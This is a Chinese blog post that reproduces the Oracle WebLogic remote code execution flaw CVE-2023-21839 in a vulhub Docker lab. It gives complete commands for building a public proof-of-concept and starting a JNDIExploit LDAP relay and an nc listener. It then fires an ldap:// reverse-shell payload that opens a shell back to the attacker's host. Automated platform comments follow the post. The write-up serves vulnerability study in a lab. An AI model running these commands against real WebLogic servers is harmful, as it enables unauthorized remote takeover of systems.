Weblogic远程代码执行漏洞（CVE-2023-21839)复现

Oracle WebLogic Server是美国甲骨文（Oracle）公司的一款适用于云环境和传统环境的应用服务中间件，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。

Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞，攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。

影响范围:

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

1. 环境搭建

1.1安装vulhub

从github上克隆： https://github.com/vulhub/vulhub.git

安装完成查看vulhub目录（有大量的环境漏洞环境）

1.2.拉取环境

☁进入对应的漏洞环境目录

cd /vulhub/weblogic

☁启动容器，拉取环境

docker-compose up -d # 首次拉取会自动下载对应配置，出现done字样即为完成

docker ps #查看开启情况

☁访问管理地址:

http://xx.xx.xx.xx:7001/console

ps：有些同学可能不知道账号密码(查看账密的方法:)

docker-compose logs | grep password

2.攻击环境搭建

Poc地址

https://github.com/4ra1n/CVE-2023-21839

cd cmd
go build -o CVE-2023-21839

ps:若没安装go，则需要apt-get安装一下（kali可能需要先更新源）

攻击命令：

（-ip和-port为靶机的IP和端口，-ldap里的IP都为攻击IP，前面的端口号是中转工具的默认端口，后面为导出的端口号）

./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892

JNDIExploit v1.4地址：

https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4

rz              #从客户端上传文件到kali
unzip           #解压压缩包

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx2

（-i为攻击机IP）

3.复现过程

1、开启中转工具监听

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx2
2、开启nc监听
 
nc -lvnp 7892
3、发动攻击
 
./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892
 
3.1在发动攻击时，./CVE-2023-21839这里会很快结束连接，然后在nc上会显示已成功获取shell
 
至此，复现结束~
 
复现过程中，会出现各种各样报错，小伙伴多找网上文章解决，本文仅作参考。
 
PS：文章对小伙伴有帮助的话，点赞支持下吧~欢迎各位师傅批评指正
 
https://cloudmysrc.github.io/
                    CSDN-Ada助手: 
                    恭喜您写下了第7篇博客！标题“网络安全之分析研判技术”听起来非常吸引人。您对网络安全领域的研究和分享真是令人钦佩。通过深入分析和研判技术，您为读者提供了宝贵的见解和实用的建议，这对于当今网络安全威胁不断增加的环境非常重要。
我非常期待您未来博客的创作！鉴于您在网络安全领域的专业知识，我建议您在未来的文章中可以探讨一下防范网络攻击的最佳实践和最新趋势，或者分享一些应对日益复杂的网络威胁的策略。这样的内容将进一步增加读者对您博客的关注，并为他们提供更多有关网络安全的帮助。再次感谢您的分享，期待您的下一篇博客！
                Weblogic远程代码执行漏洞（CVE-2023-21839)复现
                    CSDN-Ada助手: 
                    恭喜博主成功复现Weblogic远程代码执行漏洞(CVE-2023-21839)！不断分享安全漏洞复现经验，对整个安全社区都是一大贡献。希望在未来的博客中，可以结合实际案例或者更深入的分析，让读者能更好地理解漏洞的原理和防范措施。期待您的下一篇精彩内容！
                Docker 的基本概念和优势，以及在应用程序开发中的实际应用。
                    CSDN-Ada助手: 
                    恭喜您撰写了标题为“Docker 的基本概念和优势，以及在应用程序开发中的实际应用。”的第三篇博客！您在这篇博客中详细介绍了Docker的基本概念和优势，以及它在应用程序开发中的实际应用。这篇博客对读者来说是非常有价值的，能够帮助他们更好地理解和应用Docker。
在下一步的创作中，我建议您可以进一步探讨Docker的一些高级概念和技术应用，比如容器编排工具和容器化部署的最佳实践。这些内容将进一步丰富您的博客，并帮助读者更好地应用Docker在实际场景中。
谦虚的语气是非常重要的，因为持续创作是一个不断学习和成长的过程。请您继续保持对知识的渴望和谦逊的态度，相信您的博客会越来越有深度和影响力。祝您在接下来的创作旅程中取得更大的成功！
CSDN 正在通过评论红包奖励优秀博客，请看红包流：https://bbs.csdn.net/?type=4&header=0&utm_source=csdn_ai_ada_blog_reply3